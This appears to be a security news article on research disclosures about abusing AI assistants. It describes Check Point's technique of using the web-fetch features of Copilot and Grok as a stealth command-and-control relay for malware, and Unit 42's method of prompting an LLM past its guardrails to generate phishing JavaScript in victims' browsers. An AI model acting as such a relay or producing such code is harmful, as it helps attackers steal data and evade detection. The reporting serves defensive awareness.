
Cybersecurity researchers have revealed that artificial intelligence (AI) assistants that support web browsing and URL fetching functions could be turned into stealth command-and-control (C2) relays. This technique could allow attackers to slip into legitimate corporate communications and evade detection.
This attack technique has been demonstrated against Microsoft Copilot and xAI Grok and has been codenamed AI as a C2 proxy by Check Point.
The cybersecurity firm says it leverages “anonymous web access combined with viewing and summary prompts.” “The same mechanisms also enable AI-assisted malware operations, such as generating reconnaissance workflows, scripting attacker actions, and dynamically deciding ‘what to do next’ during a breach.”
This development signals yet another consequential evolution in how threat actors exploit AI systems, not only to amplify or accelerate various stages of the cyberattack cycle, but also to leverage APIs to dynamically generate code at runtime that can adapt their behavior based on information gleaned from compromised hosts and evade detection.
AI tools are already acting as a force multiplier for adversaries, allowing attackers to delegate key steps in their campaigns, such as conducting reconnaissance, scanning vulnerabilities, crafting convincing phishing emails, creating synthetic identities, debugging code, and developing malware. But AI as a C2 proxy goes a step further.

Essentially, it leverages the web browsing and URL fetch capabilities of Grok and Microsoft Copilot to retrieve attacker-controlled URLs and return responses through a web interface. This essentially transforms it into a two-way communication channel for accepting commands issued by the operator and tunneling the victim’s data.
Notably, they all work without the need for API keys or registered accounts, rendering traditional approaches like revoking keys and suspending accounts useless.
From another perspective, this approach is no different from attack campaigns that weaponize trusted services for malware distribution or C2. This is also known as Living Off Trust Site (LOTS).

However, there are important prerequisites for all this to happen. The attacker must have already compromised the machine and installed the malware through other means. Using Copilot or Grok as a C2 channel using a specially crafted prompt, the AI agent then connects to the attacker-controlled infrastructure and sends a response back to the malware containing commands to be executed on the host.
Check Point also noted that attackers could go beyond command generation to use AI agents to devise evasion strategies and decide on the next course of action by handing over system details to verify whether it is worth exploiting.
“Being able to use AI services as a stealth transport layer means the same interface can also carry prompts and model outputs that serve as external decision-making engines, providing a stepping stone to AI-driven implants and AIOps-style C2 that automate triage, targeting, and operational choices in real time, Check Point said.
This disclosure comes several weeks after Palo Alto Networks Unit 42 demonstrated a new attack technique that can turn a seemingly innocuous web page into a phishing site by using client-side API calls to a trusted large-scale language model (LLM) service to dynamically generate malicious JavaScript in real-time.
This technique is similar to a last mile reassembly (LMR) attack, where malware is smuggled across the network via unmonitored channels such as WebRTC or WebSockets, directly into the victim’s browser, effectively bypassing security controls in the process.
Unit 42 researchers Shehroze Farooqi, Alex Starov, Diva-Oriane Marty, and Billy Melicher said, “An attacker could use carefully designed prompts to circumvent the AI’s safety guardrails and trick the LLM into returning malicious code snippets.” “These snippets are returned via the LLM Service API, assembled and executed in the victim’s browser at runtime to generate a fully functional phishing page.”
Source link
